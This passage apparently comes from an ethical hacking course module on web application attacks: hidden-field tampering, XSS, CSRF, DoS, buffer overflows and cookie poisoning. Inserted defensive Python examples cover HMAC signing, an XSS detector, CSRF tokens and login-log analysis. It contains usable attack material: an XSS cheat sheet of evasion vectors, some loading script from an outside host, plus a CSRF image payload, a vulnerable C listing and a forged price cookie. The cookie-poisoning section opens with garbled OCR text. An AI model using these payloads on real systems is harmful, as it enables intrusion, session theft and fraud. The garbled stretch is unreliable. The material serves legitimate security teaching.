5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.

Editing the saved page is only the simplest route; an intercepting proxy changes the same value in the request in flight, without touching the HTML, so the server cannot rely on the page it served being the page that was submitted.

FIGURE: Hidden Field Manipulation Attack (the HTML code above; normal request http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00 with hidden field Price = 200.00; attack request http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00)
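The two server-side fixes for the hidden price field, as an added example that is not part of the original module. It is Python; the product name and price are the page's, while the catalogue, the server key and the request dictionaries are constructed for the example. The first fix is the one to prefer: the client sends only the product and the server owns the price. The second covers values that genuinely have to round-trip through the client, by signing them with an HMAC so any edit is detected.

```python
import hashlib
import hmac

# Assumed server-side secret and price list (constructed for the example; the
# key never leaves the server, which is the whole point of the signature).
SERVER_KEY = b"assumed-server-secret-key"
CATALOG = {"Juggyboy Shirt": "200.00"}


def charge_vulnerable(form):
    """The page's design: the price travels in a hidden field and is trusted."""
    return form["price"]


def charge_by_lookup(form):
    """Fix 1: the client sends only the product; the server looks up the price."""
    return CATALOG[form["product"]]


def sign_hidden(product, price):
    """Fix 2, for values that must round-trip through the client: an HMAC tag
    over product and price, computed with the server-side key and sent along
    in a further hidden field."""
    msg = f"{product}|{price}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def charge_signed(form):
    """Recompute the tag and compare in constant time; any edit to the
    hidden field (or to the tag itself) makes the comparison fail."""
    expected = sign_hidden(form["product"], form["price"])
    if not hmac.compare_digest(expected, form.get("sig", "")):
        raise ValueError("tampered hidden field")
    return form["price"]


def demo():
    """Constructed requests: the honest form and the page's 2.00 edit.
    Returns (vulnerable total, lookup total, signed honest total, signed tampered outcome)."""
    honest = {"product": "Juggyboy Shirt", "price": "200.00"}
    honest["sig"] = sign_hidden(honest["product"], honest["price"])
    tampered = dict(honest, price="2.00")  # edited in the saved HTML or in a proxy
    try:
        signed_result = charge_signed(tampered)
    except ValueError as err:
        signed_result = str(err)
    return (charge_vulnerable(tampered), charge_by_lookup(tampered),
            charge_signed(honest), signed_result)


if __name__ == "__main__":
    print(demo())
```

The signature stops editing but not replay: a tag over an old, lower price stays valid until the key changes. Where that matters, include an order identifier or an expiry time in the signed message and check it on the way back in.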

Cross-Site Scripting (XSS) Attacks

- Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users.
- It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering.
- Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.

Consequences: malicious script execution, session hijacking, redirecting to a malicious server, brute force password cracking, exploiting user privileges, data theft, ads in hidden iframes and pop-ups, intranet probing, data manipulation, keylogging and remote monitoring.

Cross-site scripting is also called XSS. The vulnerability occurs when an attacker uses a web application to send malicious JavaScript code to other end users. It arises when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can mount an attack using that input, and it can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user trusts the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions.
An attacker often uses different encodings (for example Unicode) for the malicious portion of the tag, so that the request seems genuine to the user. Possible consequences include:

- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden iframes and pop-ups
- Data manipulation
- Keylogging and remote monitoring

How XSS Attacks Work

This example uses a vulnerable page that handles requests for nonexistent pages, a classic 404 error page.

Normal request:

    http://juggyboy.com/jason_file.html

Server response:

    404 Not found /jason_file.html

Server code (handles requests for a nonexistent page, a classic 404 error page):

    <html>
    <body>
    <?php
    print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    ?>
    </body>
    </html>

XSS attack code:

    http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>

Server response: the script tag is echoed into the page unchanged, and the victim's browser executes it and shows the alert. Because the code calls urldecode() on the request URI, the attacker can send the payload fully URL-encoded, so it does not even have to look like HTML on the wire.

To understand how cross-site scripting is typically exploited, consider the hypothetical example above.

FIGURE 13.15: How XSS Attacks Work

Cross-Site Scripting Attack Scenario: Attack via Email

In a cross-site scripting attack via email, the attacker crafts an email that contains a link to a malicious script and sends it to the victim. In the slide's example the email reads:

    Hi, You have won a lottery of $2M, click the link to claim it.
    <A HREF=http://juggyboy.com/...

Malicious script:

    <A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. The legitimate server sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client's machine. In the slide the server's reply carries the client profile (Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010) and the malicious code runs in the client's web browser.
The following diagram depicts the cross-site scripting attack scenario via email:

FIGURE: Attack via Email (the attacker sends an email with the malicious link; the request is received by the legitimate server)

XSS Example: Attack via Email

The following are the steps involved in an XSS attack via email (the actors are the user's browser, the malicious script, the attacker's server, and the legitimate server):
1. Construct a malicious link:
    <A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. The user requests the page.
4. The legitimate server sends a response page with the malicious script.
5. The malicious script runs in the user's browser.

FIGURE: Attack via Email (User's Browser, Malicious Script, Attacker's Server, Legitimate Server)

XSS Example: Stealing Users' Cookies

To steal a user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger). The following are the steps involved in stealing a user's cookies with the help of an XSS attack:
1. The attacker initially hosts a page with a malicious script.
2. The user visits the page hosted by the attacker.
3. The attacker's server sends the response as HTML containing the malicious script.
4. The user's browser runs the malicious script in the HTML.
5. The cookie logger in the malicious script collects the user's cookies.
6. The malicious script redirects the user to the attacker's server.
7. The user's browser sends the request with the user's cookies.

FIGURE: Stealing Users' Cookies (User's Browser, Malicious Script, Attacker's Server)

XSS Example: Sending an Unauthorized Request

Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. The attacker constructs a malicious link.
2. The attacker sends an email containing the URL to the user and convinces the user to click on it.
3. The user's browser sends a request to the attacker's server for the page.
4. The attacker's server, in response to the user's request, sends the page with the malicious script.
5. The user's browser runs the malicious script.
6. The malicious script sends an unauthorized request.

FIGURE: Sending an Unauthorized Request

XSS Attack in a Blog Posting

The following diagram depicts an XSS attack in a blog posting. The attacker adds a malicious script in the comment field of a blog post; the comment with the malicious link is stored on the server (database server and web application), and a user who loads the post is redirected to a malicious website, juggyboy.com.

Malicious code injected into the blog post:
    <script>onload=window.location='http://www.juggyboy.com'</script>

FIGURE 13.20: XSS Attack in a Blog Posting

XSS Attack in a Comment Field

Many Internet web programs use HTML pages that dynamically accept data from different sources, and the data in the HTML pages can be changed dynamically according to the request. Attackers use the HTML web page's tags to manipulate the data and launch the attack by placing a malicious script in the comments feature. When the target views the comment and activates it, the malicious script is executed in the target's browser, initiating malicious actions.

In the slide's example, a user visits the ITechPost website (an article headed "Facebook acquires file-sharing service", about a New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options). An ordinary comment reads "Jason, I love your blog post! - Mark (mark@miccasoft.com)". The attacker leaves a comment containing the malicious code:
    <script>alert("Hello World")</script>
The comment with the malicious link is stored on the server (database server and web application), and the alert pops up as soon as the web page is loaded (pop-up window).

FIGURE: XSS Attack in a Comment Field (the attacker adds the malicious script <script>alert("Hello World")</script> in the comment field of the blog post; the comment is stored on the server; the alert pops up as soon as the web page is loaded)

XSS Cheat Sheet

- XSS locator: '';!--"<XSS>=&{()}
- Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- Image XSS: <IMG SRC="javascript:alert('XSS');">
- No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
- Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
- HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
- Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- Embedded tab: <IMG SRC="jav	ascript:alert('XSS');"> (a literal tab character between jav and ascript)
- Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
- Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
- Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
- Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
- Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- Non-alpha-non-digit XSS part 2: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
- No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
- Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
- Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
- XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>
- Escaping JavaScript escapes: \";alert('XSS');//
- End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
- IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
- BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
- LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
- STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- Local htc file: <XSS STYLE="behavior: url(xss.htc);">
- VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
- Mocha: <IMG SRC="livescript:[code]">
- US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
- META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
- TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">

FIGURE 13.22: XSS Cheat Sheet
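The cheat sheet works because browsers tolerate entity encoding, embedded whitespace and mixed case inside a URL scheme. The following detector, an added example rather than the module's or RSnake's code, normalizes an untrusted HTML fragment the way a browser would before checking it; the tag, attribute and scheme lists are assumptions drawn from the cheat sheet entries, and the samples are constructed.

```python
"""Detect the cheat-sheet obfuscations by normalizing input the way a browser does.
Added example, not the module's code: it decodes nested HTML entities, strips the
tab/newline/CR/NUL characters browsers ignore inside a URL scheme, folds case, then
flags script tags, on* handlers and URL attributes with a script: pseudo-protocol.
Tag, attribute and scheme lists are assumptions drawn from the cheat sheet entries."""
import html
import re
from html.parser import HTMLParser

_SCHEME_NOISE = re.compile(r"[\t\n\r\x00]")                  # jav\tascript: still runs as javascript:
_SCRIPT_SCHEMES = {"javascript", "vbscript", "livescript"}   # livescript: is the "Mocha" entry
_URL_ATTRS = {"src", "href", "dynsrc", "lowsrc", "background"}
_ACTIVE_TAGS = {"script", "iframe", "layer", "bgsound"}
_STYLE_PATTERN = re.compile(r"behavior\s*:|expression\s*\(", re.IGNORECASE)


def normalize_url(value: str) -> str:
    """Collapse the encodings the cheat sheet relies on so comparisons see the real scheme."""
    prev, cur = None, value or ""
    while cur != prev:                      # nested entities: &amp;#x09; -> &#x09; -> TAB
        prev, cur = cur, html.unescape(cur)
    cur = _SCHEME_NOISE.sub("", cur)
    return cur.strip(" `'\"").lower()       # grave-accent and quote wrappers


def script_scheme(value: str) -> str:
    """Return 'javascript'/'vbscript'/'livescript' if the URL would execute script, else ''."""
    scheme, sep, _ = normalize_url(value).partition(":")
    scheme = scheme.strip()
    return scheme if sep and scheme in _SCRIPT_SCHEMES else ""


class _Scanner(HTMLParser):
    """HTMLParser already lowercases tag/attribute names and decodes entities in attribute values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in _ACTIVE_TAGS:
            self.findings.append(f"<{tag}> tag")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")
            elif name in _URL_ATTRS and script_scheme(value):
                self.findings.append(f"<{tag}> {name} uses {script_scheme(value)}: scheme")
            elif name == "style" and _STYLE_PATTERN.search(value):
                self.findings.append(f"<{tag}> style with behavior/expression")
            elif tag == "meta" and name == "content":
                target = value.lower().partition("url=")[2]   # refresh: "0;url=javascript:..."
                if script_scheme(target):
                    self.findings.append("meta refresh to script: scheme")


def find_xss_indicators(fragment: str) -> list:
    """Scan one untrusted HTML fragment (a comment, a profile field) and list what was found."""
    scanner = _Scanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings


# Constructed samples: five cheat-sheet entries and two benign tags.
SAMPLES = [
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    '<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">',
    "<IMG SRC=javascript:alert(&quot;XSS&quot;)>",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<BODY onload=alert('XSS')>",
    '<img src="/images/logo.png" alt="logo">',
    '<a href="https://example.com/">link</a>',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:70s} -> {find_xss_indicators(sample)}")
```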

Cross-Site Request Forgery (CSRF) Attack

Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the vulnerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually can't be accessed by outside attackers, so CSRF is one of the ways to get into the network. The web application's inability to differentiate a request made by malicious code from a genuine request exposes it to a CSRF attack.

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.

FIGURE: Cross-site Request Forgery (CSRF) Attack (User, Trusted Website, Malicious Website: the user logs into the trusted site and creates a new session; the browser stores the session identifier for the session in a cookie; the user visits a malicious website; a request is sent from the user's browser using his session cookie)

How CSRF Attacks Work

In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into clicking a malicious link containing arbitrary code. When the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:

Client Side Code (the buy form served by the trusted server):
    <form action="buy.php" method="post">
    <p>Symbol: <input type="text" name="symbol" /></p>
    <p>Shares: <input type="text" name="shares" /></p>
    <p><input type="submit" value="Buy" /></p>
    </form>

Server Code (buy.php on the trusted server):
    <?php
    session_start();
    if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares'])) {
        buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
    }
    ?>

Malicious Code (on the malicious server):
    <img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=..." />

Steps shown in the figure:
1. The user logs into the trusted server using his credentials.
2. The server sets a session cookie in the user's browser.
3. The attacker sends a phishing mail tricking the user into sending a request to a malicious site.
4. The user requests a page from the malicious server.
5. The response page contains the malicious code.
6. The malicious code is executed in the trusted server.

FIGURE: How CSRF Attacks Work
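The server code above acts on any request that carries symbol and shares, which is why the image tag's GET succeeds with the victim's session cookie. The following synchronizer-token version of the handler is an added example, not the module's code; the session layout, the field name csrf_token and the share count used in the replay are assumptions.

```python
"""Synchronizer-token fix for the buy.php handler shown above.
Added example, not the module's code. buy.php acts on $_REQUEST, so the <img> GET planted
on the malicious page buys stock using the victim's session cookie; process_buy() below
accepts only a POST carrying the per-session token, which the attacker's page cannot read.
The session layout, field names and the test share count are assumptions."""
import hmac
import secrets


def new_session(user: str) -> dict:
    """Server-side session created at login; the CSRF token lives here, never in a cookie."""
    return {"user": user, "csrf_token": secrets.token_hex(32), "orders": []}


def session_cookie_header(session_id: str) -> str:
    """Second layer: SameSite keeps the browser from attaching the cookie to cross-site
    requests, HttpOnly keeps a stray XSS from reading it (attribute set is an assumption)."""
    return f"Set-Cookie: PHPSESSID={session_id}; Secure; HttpOnly; SameSite=Lax"


def render_buy_form(session: dict) -> str:
    """The trusted page embeds the token as a hidden field; same-origin policy keeps the
    attacker's page from reading this HTML, so it cannot forge a matching POST."""
    return (
        '<form action="buy.php" method="post">'
        f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}" />'
        '<p>Symbol: <input type="text" name="symbol" /></p>'
        '<p>Shares: <input type="text" name="shares" /></p>'
        '<p><input type="submit" value="Buy" /></p>'
        "</form>"
    )


def process_buy(session: dict, method: str, params: dict) -> str:
    """Hardened buy.php: verify method and token before touching symbol/shares."""
    if method != "POST":
        # An <img src=...> can only issue a GET; a state change must never hang off one.
        return "rejected: state-changing request must be POST"
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):  # constant-time compare
        return "rejected: missing or invalid CSRF token"
    symbol, shares = params.get("symbol"), params.get("shares", "")
    if not symbol or not shares.isdigit() or int(shares) == 0:
        return "rejected: symbol and a positive share count are required"
    session["orders"].append((symbol.upper(), int(shares)))
    return f"bought {int(shares)} {symbol.upper()} for {session['user']}"


def csrf_scenario() -> dict:
    """Replay the module's figure: the <img> on the malicious page, a forged POST, then a
    legitimate submission of the form rendered by the trusted server."""
    session = new_session("victim")
    forged_get = {"symbol": "MSFT", "shares": "1000"}   # the juggyshop.php?symbol=MSFT&shares=... image
    forged_post = dict(forged_get, csrf_token="0" * 64)            # attacker guesses a token
    genuine = dict(forged_get, csrf_token=session["csrf_token"])   # posted from the real form
    return {
        "img_get": process_buy(session, "GET", forged_get),
        "forged_post": process_buy(session, "POST", forged_post),
        "genuine_post": process_buy(session, "POST", genuine),
        "orders": list(session["orders"]),
    }


if __name__ == "__main__":
    for step, outcome in csrf_scenario().items():
        print(f"{step:13s}: {outcome}")
```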

Web Application Denial-of-Service (DoS) Attack

Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

Why are applications vulnerable? The following issues make web applications vulnerable:
- Reasonable use of expectations
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Targets: web server resource consumption (CPU, memory, and sockets) and web services unavailability (disk bandwidth, database bandwidth, and worker processes). In a web application denial-of-service attack the attacker targets and tries to exhaust CPU, memory, sockets, disk bandwidth, database bandwidth, and worker processes.

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them undetectable by existing DoS protection measures.
Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
- Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses

Denial-of-Service (DoS) Examples

Most web applications are designed to serve or withstand a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests to the web application until it is exhausted. Once the web application receives enough requests, it stops responding to other requests, even those sent by authorized users, because the attacker has overwhelmed the web application with false requests. Various web application DoS attacks include:

- User Registration DoS: The attacker could create a program that submits the registration form repeatedly, adding a large number of spurious users to the application.
- Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond to genuine users.
- User Enumeration: If the application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application.
- Account Lock-Out Attacks: Dictionary attacks can be minimized by applying an account lock method, but the attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
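The user enumeration and account lock-out attacks above leave a recognizable trace in the authentication log: one source failing against many distinct names with no success, or repeated failures against known-valid accounts. The following analysis is an added example, not the module's code; the log format, the valid-user list, the thresholds and the TEST-NET addresses are all constructed, and login_response shows the single-message fix for the enumeration case.

```python
"""Spotting the login-based DoS patterns above (user enumeration, account lock-out sweeps)
in authentication logs. Added example, not the module's code; the log format
("timestamp ip username result"), the valid-user list, the thresholds and all
addresses (TEST-NET ranges) are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

VALID_USERS = {"alice", "bob", "carol"}          # accounts the application actually has
ENUM_MSG = "user enumeration: many distinct names failing, no successes"

# Constructed sample: a normal user mistyping once, a dictionary sweep, a lock-out attempt.
SAMPLE_LOG = """\
2010-09-21T10:00:01 198.51.100.7 alice FAIL
2010-09-21T10:00:09 198.51.100.7 alice OK
2010-09-21T10:01:00 203.0.113.5 admin FAIL
2010-09-21T10:01:01 203.0.113.5 root FAIL
2010-09-21T10:01:02 203.0.113.5 test FAIL
2010-09-21T10:01:03 203.0.113.5 guest FAIL
2010-09-21T10:01:04 203.0.113.5 info FAIL
2010-09-21T10:01:05 203.0.113.5 webmaster FAIL
2010-09-21T10:02:00 203.0.113.9 alice FAIL
2010-09-21T10:02:01 203.0.113.9 alice FAIL
2010-09-21T10:02:02 203.0.113.9 alice FAIL
2010-09-21T10:02:03 203.0.113.9 bob FAIL
2010-09-21T10:02:04 203.0.113.9 bob FAIL
2010-09-21T10:02:05 203.0.113.9 bob FAIL
"""


def parse_log(text: str) -> list:
    """One (timestamp, ip, user, result) tuple per non-empty line."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, ip, user, result = line.split()
            events.append((datetime.fromisoformat(ts), ip, user, result))
    return events


def analyse(events, window=timedelta(minutes=5), enum_names=5, lockout_fails=3) -> dict:
    """Per source IP, look at failures inside a sliding window:
    - many distinct user names failing with no success = dictionary-driven enumeration
    - repeated failures against known-valid accounts = lock-out attack that will DoS those users"""
    findings = defaultdict(set)
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    for ip, evs in by_ip.items():
        for i, (start, _, _, _) in enumerate(evs):
            recent = [e for e in evs[i:] if e[0] - start <= window]
            fails = [e for e in recent if e[3] == "FAIL"]
            no_success = not any(e[3] == "OK" for e in recent)
            if no_success and len({e[2] for e in fails}) >= enum_names:
                findings[ip].add(ENUM_MSG)
            per_user = defaultdict(int)
            for e in fails:
                if e[2] in VALID_USERS:
                    per_user[e[2]] += 1
            for user, n in per_user.items():
                if n >= lockout_fails:
                    findings[ip].add(f"lock-out pressure on valid account {user}")
    return {ip: sorted(f) for ip, f in findings.items()}


def login_response(username_known: bool, password_ok: bool) -> str:
    """Mitigation for enumeration: the same message whichever half of the pair was wrong."""
    return "login ok" if username_known and password_ok else "Invalid username or password"


if __name__ == "__main__":
    for ip, reasons in analyse(parse_log(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(reasons))
```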

Buffer Overflow Attacks

A buffer has a specified data storage capacity, and if the amount of data exceeds it, the buffer overflows; that is, a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are developed to hold a finite amount of data; additional information can be directed wherever it needs to go. However, extra information may overflow into neighboring buffers, destroying or overwriting legitimate data.

Vulnerable Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *dest_buffer;
        dest_buffer = (char *) malloc(10);
        if (NULL == dest_buffer)
            return -1;
        if (argc > 1) {
            /* strcpy copies the whole argument with no length check: an argument of
               10 or more characters overflows the 10-byte heap buffer */
            strcpy(dest_buffer, argv[1]);
            printf("The first command-line argument is %s.\n", dest_buffer);
        } else {
            printf("No command-line argument was given.\n");
        }
        free(dest_buffer);
        return 0;
    }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.

Arbitrary Code

A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application is damaged. An attacker can then send specially crafted input to the web application so that the web application executes the arbitrary code, allowing the attacker to take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, an attacker who recognizes a potential buffer overflow can access a staggering array of products and components.

Buffer Overflow Potential

Both the web application and server products, which act as static or dynamic features of the site or of the web application, contain the potential for a buffer overflow error. Buffer overflow potential that is found in server products is commonly known and creates a threat to the users of that product. When web applications use libraries, they become vulnerable to a possible buffer overflow attack. Custom web application code, through which a web application is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected, and there are fewer attackers who find and develop such errors. If one is found in the custom application (other than crashing the application), the capacity to use this error is reduced by the fact that both the source code and the error message are not accessible to the attacker.

Vulnerable Code: the listing shown above under Buffer Overflow Attacks.

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17: Buffer Overflow Attacks.

83 I Cookie/Session Poisoning CEH ( rtifwd I itkitjl Nm Im Cookies are used to m aintain session state in the otherwise stateless HTTP protocol Modify the Cookie Content Inject the Malicious Content Rewriting the Session Data C o o k ie p o is o n in g a t ta c k s in v o lv e t h e m o d if ic a t io n o f t h e c o n t e n t s o f a c o o k ie ( p e r s o n a l in f o r m a t io n s to r e d in a w e b u s e r 's c o m p u t e r ) in o r d e r t o b y p a s s s e c u r it y m e c h a n is m s A P o is o n in g a llo w s a n a t ta c k e r t o in je c t t h e m a lic io u s c o n t e n t, m o d if y t h e u s e r 's o n lin e e x p e r ie n c e, a n d o b t a in t h e u n a u th o r iz e d in f o r m a t io n A p r o x y c a n b e u s e d f o r r e w r it in g t h e s e s s io n d a t a, d is p la y in g t h e c o o k ie d a t a, a n d / o r s p e c ify in g a n e w u s e r ID o r o t h e r s e s s io n id e n t if ie r s in t h e c o o k ie Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. C o o k i e / S e s s i o n P o i s o n i n g Cookies frequently transm it sensitive credentials and can be m odified w ith ease to escalate access or assume the identity of another user. Cookies are used to m aintain a session state in the otherw ise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the w eb application. Poisoning of cookies and session inform ation can allow an attacker to inject malicious content or otherw ise m odify the user's on-line experience and obtain unauthorized inform ation. Cookies can contain session-specific data such as user IDs, passwords, account num bers, links to shopping cart contents, supplied private inform ation, and session IDs. Cookies exist as files stored in the client com puter's m em ory or hard disk. By m odifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. 
Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security.

Threats

The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account in order to assume the identity of other users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access that the vulnerable web application provides are open for the attacker to exploit. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie.

Cookies can be persistent or non-persistent and secure or non-secure, so a cookie is one of four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies are transferred only through SSL connections.

How Cookie Poisoning Works

Cookies are mainly used by web applications to simulate a stateful experience for the end user. They serve as an identity for the server side of web application components. This attack alters the value of a cookie at the client side prior to the request being sent to the server. A web server can set a cookie in any response by sending a Set-Cookie header carrying the cookie string. The cookies are stored on the user's computer and are a standard way of recognizing users. Once a cookie has been set, it is sent with every subsequent request to the web server. To provide further functionality to the application, cookies can be modified and analyzed by JavaScript.

In this attack, the attacker sniffs the user's cookies, modifies the cookie parameters, and submits the request to the web server. The server then accepts the attacker's request and processes it.

The following diagram explains the process of a cookie poisoning attack:

FIGURE: How Cookie Poisoning Works

1. User browses a web page. The web server replies with the requested page and sets a cookie on the user's browser:

   GET /store/buy.aspx?checkout=yes HTTP/1.0
   Host:
   Accept: */*
   Referrer:
   Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

2. Attacker steals the cookie (sniffing, XSS, phishing attack).

3. Attacker orders the product using the modified cookie (TotalPrice rewritten):

   GET /store/buy.aspx?checkout=yes HTTP/1.0
   Host:
   Accept: */*
   Referrer:
   Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

4. Product is delivered to the attacker's address.
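The two points this section makes are that reversible encodings such as Base64 and ROT13 do not protect cookie contents, and that a server which trusts a client-supplied TotalPrice can be made to ship goods for 100 instead of 11568. The following is an added example, not code from the module or from EC-Council; it reconstructs the cookie fields from the figure as a Python dict, shows both encodings being undone without a key, and then signs the cookie with an HMAC so that the TotalPrice rewrite from step 3 is detected server-side. The secret key is a placeholder:

```python
import base64
import codecs
import hashlib
import hmac

# Cookie fields from the figure above, reconstructed here as a dict.
ORIGINAL_COOKIE = {
    "SESSIONID": "325896ASDD23SA3587",
    "BasketSize": "3",
    "Item1": "1258",
    "Item2": "2658",
    "Item3": "6652",
    "TotalPrice": "11568",
}

# Placeholder key for the example only; a real server loads it from a secret store.
SERVER_SECRET = b"example-only-server-secret"


def obfuscate(value: str, scheme: str) -> str:
    """The two reversible 'encodings' the text warns about."""
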